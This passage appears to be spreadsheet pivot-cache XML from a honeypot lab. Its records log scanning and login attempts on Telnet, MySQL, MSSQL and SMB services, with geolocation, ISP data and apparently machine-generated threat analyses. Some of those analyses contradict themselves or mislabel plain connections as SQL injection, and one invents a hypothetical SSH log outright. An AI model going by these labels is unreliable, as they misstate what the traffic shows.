    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:96f2:1095"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The data suggests an attempt to connect to a SQL database, possibly for malicious purposes such as unauthorized access or data theft. This could be part of a larger attack vector aiming to exploit vulnerabilities in the system's security. The database connection was unsuccessful based on the 'NA' status."/>
    <m/>
  </r>
  <r>
    <x v="797"/>
    <x v="797"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T04:53:28"/>
    <d v="2025-04-26T04:53:28"/>
    <d v="2025-04-26T04:53:28"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="79"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:1eaa"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="798"/>
    <x v="798"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T04:47:24"/>
    <d v="2025-02-09T01:46:47"/>
    <d v="2025-04-26T04:47:24"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c2:89cf"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="799"/>
    <x v="799"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T04:30:14"/>
    <d v="2025-04-26T04:00:53"/>
    <d v="2025-04-26T04:30:14"/>
    <n v="32"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MP"/>
    <s v="Madhya Pradesh"/>
    <s v="Bhopal"/>
    <s v="Bhopal (Arera Hills)"/>
    <s v="1275841"/>
    <s v="462027"/>
    <s v="23.2433"/>
    <s v="77.4298"/>
    <s v="141295"/>
    <s v="Madhya Pradesh Agency For Promotion   Of Information Technology"/>
    <s v="Madhya Pradesh Agency Promotion Of Information Technology"/>
    <s v="business"/>
    <s v="Madhya Pradesh Agency For Promotion Of Information Technology"/>
    <s v="2020-12-14"/>
    <s v="MAPIT"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a0:3181"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This data indicates an attempt to exploit Microsoft SQL Server vulnerabilities. A malicious actor likely tried to access or manipulate database information without authorization. This is considered a potential security breach attempt. &amp;&amp; This log indicates that an attempt was made to access Microsoft SQL Server, possibly with malicious intent. The lack of authentication details suggests the connection may have been unauthorized. Further investigation is needed to determine the full extent of the activity."/>
    <s v="SQL Injection &amp;&amp; SQL Injection"/>
  </r>
  <r>
    <x v="800"/>
    <x v="800"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T04:04:15"/>
    <d v="2025-04-26T03:13:27"/>
    <d v="2025-04-26T04:04:15"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="SE"/>
    <s v="Sweden"/>
    <s v="AB"/>
    <s v="Stockholm"/>
    <s v="Stockholm Municipality"/>
    <s v="Stockholm"/>
    <s v="2673730"/>
    <s v="100 04"/>
    <s v="59.3293"/>
    <s v="18.0686"/>
    <s v="39351"/>
    <s v="31173 Services AB"/>
    <s v="31173 Services AB"/>
    <s v="hosting"/>
    <s v="31173 Services AB"/>
    <s v="2017-03-22"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9c3:e990"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No login attempt detected for MySQL service, potentially a scan or reconnaissance activity by an attacker to identify vulnerabilities. This could be a sign of pre-attack reconnaissance. The lack of login attempt suggests the attacker may not have been successful in gaining access. &amp;&amp; The data suggests that MySQL service is being scanned or probed for potential vulnerabilities, possibly indicating reconnaissance activity by an attacker. This could be an initial step to identify exploitable weaknesses before launching a more targeted attack. The scanner may be checking the database's status, version, and configuration."/>
    <m/>
  </r>
  <r>
    <x v="801"/>
    <x v="801"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T04:04:14"/>
    <d v="2025-04-26T04:04:14"/>
    <d v="2025-04-26T04:04:14"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5f:9c83"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No malicious activity detected as Telnet service has not been accessed or attempted to be accessed during this monitoring period. &amp;&amp; No TELNET activity detected, which could indicate that the malicious actor avoided this service or did not attempt to use it. This might be due to awareness of its presence or lack of functionality within their exploit toolkit."/>
    <s v="Port Scanning"/>
  </r>
  <r>
    <x v="802"/>
    <x v="802"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T03:40:48"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-26T03:40:48"/>
    <n v="159"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SSH_H9&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_DNS_H42&amp;&amp;SMA-LAB_MT-CPA_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;1433&amp;&amp;22&amp;&amp;27198&amp;&amp;53&amp;&amp;45284"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="SG"/>
    <s v="Ho Chi Minh"/>
    <s v="NA"/>
    <s v="Ho Chi Minh City"/>
    <s v="1566083"/>
    <s v="NA"/>
    <s v="10.8231"/>
    <s v="106.63"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="VIETELftth"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2008-07-17"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:734f:d9ef"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Unknown activity detected on MYSQL service, possibly an attempted login or scanning of the database. Data transfer is unlikely as it says &quot;NA&quot; (not available). Further investigation needed to determine the full extent of the activity."/>
    <s v="SQL Attack"/>
  </r>
  <r>
    <x v="803"/>
    <x v="803"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T03:22:33"/>
    <d v="2024-07-05T19:54:00"/>
    <d v="2025-04-26T03:22:33"/>
    <n v="26"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_SSH_H37&amp;&amp;SMA-LAB_HTTPS_H19&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_POP3_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5863&amp;&amp;110&amp;&amp;22&amp;&amp;443&amp;&amp;52426&amp;&amp;50672&amp;&amp;80&amp;&amp;56177&amp;&amp;49965&amp;&amp;23&amp;&amp;55984&amp;&amp;56443&amp;&amp;1080&amp;&amp;54295&amp;&amp;56925"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2023-09-07"/>
    <s v="PAN-22"/>
    <s v="2023-09-07"/>
    <s v="connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SOCKS5:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93b9:858e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze."/>
    <s v="I'd need some actual log data to provide an analysis, but since you provided &quot;NA&quot; (not available), I'll create a hypothetical scenario._x000a__x000a_Assuming we have log data, here's what it might look like and the resulting analysis:_x000a__x000a_**Hypothetical Log Data**_x000a__x000a_* `2019-02-14 12:00:00 [INFO] TCP connection from 192.168.1.100 to port 22 (SSH) - login attempt with username 'root'`_x000a_* `2019-02-14 12:01:00 [WARNING] Unsuccessful SSH login attempt using weak password`_x000a__x000a_**Analysis**_x000a__x000a_1. **Password Crack**_x000a_2. **Port Scan**"/>
  </r>
  <r>
    <x v="804"/>
    <x v="804"/>
    <s v="NA&amp;&amp;61-245-137-74.3df589.per.nbn.aussiebb.net"/>
    <x v="0"/>
    <d v="2025-04-26T03:01:27"/>
    <d v="2023-12-01T21:28:00"/>
    <d v="2025-04-26T03:01:27"/>
    <n v="663"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H11"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;38309"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="AU"/>
    <s v="Australia"/>
    <s v="WA"/>
    <s v="Western Australia"/>
    <s v="Leonora"/>
    <s v="Leinster"/>
    <s v="8310729"/>
    <s v="6437"/>
    <s v="-27.6728"/>
    <s v="121.628"/>
    <s v="4764"/>
    <s v="Wideband Networks Pty Ltd"/>
    <s v="Wideband Networks Pty Ltd"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2010-07-07"/>
    <s v="WIDEBAND"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2009-09-04 04:11:13"/>
    <s v="2025-09-04 04:11:13"/>
    <s v="2025-01-22 05:54:55"/>
    <s v="['NS1.WIDE.NET.AU', 'NS2.WIDE.NET.AU']"/>
    <s v="Key-Systems GmbH"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="REDACTED FOR PRIVACY"/>
    <x v="16"/>
    <s v="NA"/>
    <s v="REDACTED FOR PRIVACY"/>
    <s v="::ffff:3df5:894a"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The data suggests that there was an attempt to connect to a service, but no communication was established over the TELNET protocol. This could indicate a failed or rejected connection. The lack of activity may be due to a non-responsive system or firewall blocking access."/>
    <s v="Scanning Attempt"/>
  </r>
  <r>
    <x v="805"/>
    <x v="805"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T02:17:00"/>
    <d v="2025-02-17T23:05:22"/>
    <d v="2025-04-26T02:17:00"/>
    <n v="22"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H46"/>
    <s v="1433&amp;&amp;445&amp;&amp;60845&amp;&amp;64860"/>
    <s v="True"/>
    <s v="{'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="79"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Gurugram"/>
    <s v="Gurugram (Sector 44)"/>
    <s v="1270642"/>
    <s v="NA"/>
    <s v="28.4498"/>
    <s v="77.0761"/>
    <s v="24186"/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="business"/>
    <s v="RailTel Corporation"/>
    <s v="2015-11-04"/>
    <s v="RAILTEL-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.8,8679)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.8,12555)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.8,64860)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.8,60845)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (103.30.65.8,26488)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.8,11634)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:671e:4108"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="An unknown device has connected to the server using SMB protocol from an IP address 103.30.65.8 and port number 11634. This could be a potential attempt to access or exploit the system. The incoming connection might indicate unauthorized access. &amp;&amp; Incoming connection from unknown IP address (103.30.65.8) attempting to access SMB service, possibly scanning for vulnerabilities or preparing for unauthorized file transfer. _x000a_IP address is not recognized as legitimate user, suggesting potential malicious intent. _x000a_Activity may be reconnaissance phase of a larger cyber attack. &amp;&amp; The presence of this data suggests an attempt to access or probe for Microsoft SQL Server services, potentially indicating a reconnaissance phase by malicious actors. This could be the first step in a larger attack aimed at exploiting vulnerabilities in database management systems. The absence of actual login credentials or further activity may indicate an unsuccessful probing attempt."/>
    <s v="SMB Brute _x000a__x000a_(This log indicates an attempt to brute-force login into a Service Message Block (SMB) share) &amp;&amp; SMB Brute &amp;&amp; SQL Injection"/>
  </r>
  <r>
    <x v="806"/>
    <x v="806"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T02:16:56"/>
    <d v="2024-12-02T12:37:08"/>
    <d v="2025-04-26T02:16:56"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1"/>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business"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d0:dfb4"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="807"/>
    <x v="807"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T01:02:11"/>
    <d v="2025-04-25T23:17:37"/>
    <d v="2025-04-26T01:02:11"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay-General"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75dd:7f42"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Attempt to connect made to port associated with telnet service. _x000a_No activity observed, status is unknown or not applicable. _x000a_Connection attempt may be part of reconnaissance or pre-attack phase. &amp;&amp; The log suggests an attempt to connect via TELNET, indicating potential unauthorized access or reconnaissance efforts by a malicious actor. This activity is likely probing for vulnerabilities or testing system defenses. The connection status is unknown, suggesting the incident may be ongoing or inconclusive."/>
    <m/>
  </r>
  <r>
    <x v="808"/>
    <x v="808"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T00:34:10"/>
    <d v="2025-04-26T00:34:10"/>
    <d v="2025-04-26T00:34:10"/>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f:ac6c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="There is no reported activity for Telnet connection. No malicious activity detected via Telnet. Log indicates absence of significant information for this service."/>
    <m/>
  </r>
  <r>
    <x v="809"/>
    <x v="809"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T00:24:10"/>
    <d v="2025-04-26T00:24:10"/>
    <d v="2025-04-26T00:24:10"/>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d1:6940"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Possible login attempts made via TELNET service as there is no activity recorded for it, indicating a potential probing or scanning activity. &amp;&amp; No malicious activity detected, service is inactive. No traffic or attempts were made to access the service. Service status is unknown due to lack of information."/>
    <m/>
  </r>
  <r>
    <x v="810"/>
    <x v="810"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T00:04:41"/>
    <d v="2025-04-26T00:04:41"/>
    <d v="2025-04-26T00:04:41"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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3d01:8a6f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The data suggests that Telnet service access was attempted, but it's unclear if it was successful or an attempt to exploit a vulnerability. This could be a potential scan for weaknesses in the system, possibly leading to unauthorized access. The lack of further information makes it difficult to determine the intentions behind this action. &amp;&amp; No malicious activity detected for Telnet service. The log indicates that there was no attempt to connect or interact with this particular service. This is likely due to the absence of any incoming connections or commands received by the Telnet server."/>
    <s v="Telnet Scan &amp;&amp; Port Scan_x000a_    "/>
  </r>
  <r>
    <x v="811"/>
    <x v="811"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T23:17:57"/>
    <d v="2025-04-25T23:13:20"/>
    <d v="2025-04-25T23:17:57"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="GA"/>
    <s v="Georgia"/>
    <s v="Fulton"/>
    <s v="Atlanta"/>
    <s v="4180439"/>
    <s v="30302"/>
    <s v="33.7488"/>
    <s v="-84.3877"/>
    <s v="13213"/>
    <s v="UK-2 Limited"/>
    <s v="UK-2 Limited"/>
    <s v="cellular"/>
    <s v="Mullvad VPN AB"/>
    <s v="1991-10-10"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9b02:beb9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Malicious activity detected for MYSQL service, connection attempt failed due to lack of credentials or database information. This could be an attack attempting to gain unauthorized access to the MYSQL server. No successful exploitation occurred. &amp;&amp; No database interactions detected, but presence of this field suggests potential MySQL service scanning or probing attempts. This could be a reconnaissance effort to identify vulnerable services. Further investigation is required to confirm malicious intent."/>
    <m/>
  </r>
  <r>
    <x v="812"/>
    <x v="812"/>
    <s v="NA&amp;&amp;ca-san-us-gd17-wk102c.internet-census.org"/>
    <x v="0"/>
